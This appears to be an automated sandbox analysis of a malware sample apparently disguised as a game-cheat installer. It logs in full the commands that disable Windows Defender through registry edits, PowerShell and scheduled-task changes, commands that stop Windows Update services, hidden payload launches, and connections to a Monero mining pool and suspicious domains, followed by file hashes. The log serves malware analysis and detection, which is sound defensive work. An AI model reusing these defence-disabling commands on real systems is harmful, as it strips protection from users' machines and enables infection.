C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSI4529.tmp

"C:\Windows\Installer\MSI4529.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Windows\Installer\MSI452A.tmp

"C:\Windows\Installer\MSI452A.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\Installer\MSI452B.tmp

"C:\Windows\Installer\MSI452B.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\SysWOW64\timeout.exe

timeout /t 10 /nobreak

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f09ec9cd-8b64-40cb-be80-761d8cd418a7.vbs"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7a488d94-2658-43f9-9214-c80bdd229b7e.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
NL 23.137.248.138:443 systemupdate.cfd tcp
NL 23.137.248.138:443 systemupdate.cfd tcp
NL 23.137.248.138:443 systemupdate.cfd tcp
NL 23.137.248.138:443 systemupdate.cfd tcp
NL 23.137.248.138:443 systemupdate.cfd tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe

MD5 3a039b6b991977c26355a07cd491dd50
SHA1 1239a0a037a0b62b0b4c49eeddb6e73bd94de1ca
SHA256 72edc85a9ec7eaf817ed181567a48b700f6aed73403cabb6ef08a2ece182eedd
SHA512 72f3713038e99989761f788f7a60dbe9b404553a6eb66d67b8e7837c964ced2e1bf23213be5910fb0d30007af3238d0e46a15c5943963cd8f5d37258f6c017b4

C:\Users\Admin\AppData\Local\Temp\7zS6AC0.tmp\Install_YTTCHTs.exe

MD5 44339fe76ff718c01c4779ef73b65a7f
SHA1 784a99aa7b80ad63b6d6c470f19c5effb15592b2
SHA256 d709c5718aa1ca3979ac54e880fb9692c1ce35c7e6fd084c3606c32ea91b4e7f
SHA512 08623d263d43f3eebef6f35222eb4a4fcca4e4192c41930e7b727a6aa83c60efd966f5cda407104ac8e98d1fe30aa5251478f1960e70b5318cc92fdade49ab85

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 88d6ef66043282511d78477c3457cd05
SHA1 dedf2529b0f78f9d7dfe5519d080fe1d11fb0344
SHA256 82efcbda4a568f2e898f2c97d3876af8c4c42f2638a339b937b01202bb83fb4a
SHA512 506e03b18e11c6133eb4b997bfd017ab5e5ed7a253e0470ee391d8bf5f86196742b57ec03316f1d5699f7a2f556df38468c539a6ff70c52e092bf0c1de61fa2b

C:\Users\Admin\AppData\Local\Temp\MSI79F4.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Local\Temp\MSI79F4.tmp

MD5 d3c37319d38ac5a105e5a56f69a0a7fb
SHA1 0fd34a92dd9f8f205d85edabee987a42afdd0517
SHA256 d60ba191cda9118d2d06d2fcd5228f6702a5d79f3f7f8d0443c3bbe908464cbf
SHA512 8b1a750128573d7fa7e214bc11f34937aa05586a37d17bc5dde14b0f25bbd6b8e997f35706b98ec88b3910f5539e153dc8bf1a202c7932a7e3d4ae39f0115a7e

C:\Users\Admin\AppData\Local\Temp\MSI7A73.tmp

MD5 a83d936435d7c8b3eb8668ccee0ead7e
SHA1 5d1b9b5208009e11b1af98f3c38e720ef114b04c
SHA256 0bf1b14788b88047a591322851f96c22c9efe1018a2fd26eb60f275a80739e05
SHA512 91d0facc115a92f5780f1fea0713a1f95ca8a11a57372f330e69858ab62448af4a474d8b4c457e95b732a5024f5b90d751c4b44e4f2952dc9690072a907455a4

C:\Users\Admin\AppData\Local\Temp\MSI7A73.tmp

MD5 b60a53541ef0f273bffaeab2a0b5eda9
SHA1 8907683fbd563d8b25e7e25edbca163810189834
SHA256 1e9391eef3fd617bf815defc70dabddfd077c6a3780c2e94d9e387ba4b98ed37
SHA512 6dfe806e2fe38416bbf273ef55e1d4b075e7ac4332abb0133149c44641b8065cf839f0200a1a0db096c855219fdeb62603ed5658e976830255c937ce7a9a3528

C:\Users\Admin\AppData\Local\Temp\MSI7A62.tmp

MD5 bd8d46289036e3d3833cf9a19fc0e6e7
SHA1 91551f7200f32564bb7dc3f66ccaf47122459705
SHA256 980501139a8faa657b8055ad843648dc3b64504d7b4d14ef5b6a4067460332e4
SHA512 2524dfc10a4765251f5b2f4951149484f5bb04900d1d7f8487ffafbb7e6be2d8e9d05acb58330b93016fc1e309793188cead5c9ad44e73c74bf62e004358900b

C:\Users\Admin\AppData\Local\Temp\MSI7A74.tmp

MD5 d6a634a63a17058a699fb46fe24f9119
SHA1 486194d3cb204e1523471f0c034c553ac68ded7e
SHA256 9748289b70ed1a2ea784315a85d55b3d4b8eb073e0da0b83a9f26f2890d8e6e6
SHA512 1099a36348ecd0d7017b0a2af24187f6e7785614070f3e2edb83a0f76d4ae522dfd89e0b3428bda8a8c15f6e5f4de208fe9cda8d12a5ef598f7900113a303431

C:\Users\Admin\AppData\Local\Temp\MSI7A74.tmp

MD5 58359e38cd4c43fb05efed19a8b279ce
SHA1 956c58420b468be06c3e1b8be2900ce36f2ce765
SHA256 7107a37ecdc445afd27a1a7d7b82718a7f7c24202f61b867b954e6faa6b84c4b
SHA512 6ef1c725548263f8f8442f5ff3a97d456a394492c8aff3da362d63bb45b302495e6404c7ddf79088612ad1b2da3ce5b856ccb6ff487c981b11d0398ec2dfc139

C:\Users\Admin\AppData\Local\Temp\MSI7A74.tmp

MD5 35eb11f862f949e78d905899bf634244
SHA1 4e0a1eab43f7e5b1c07c92ae601366fedb05a766
SHA256 ec21bdac3633c64b4d462c3c88e950886ccbfd887d4a90d7297b6f3b7ea1c6bc
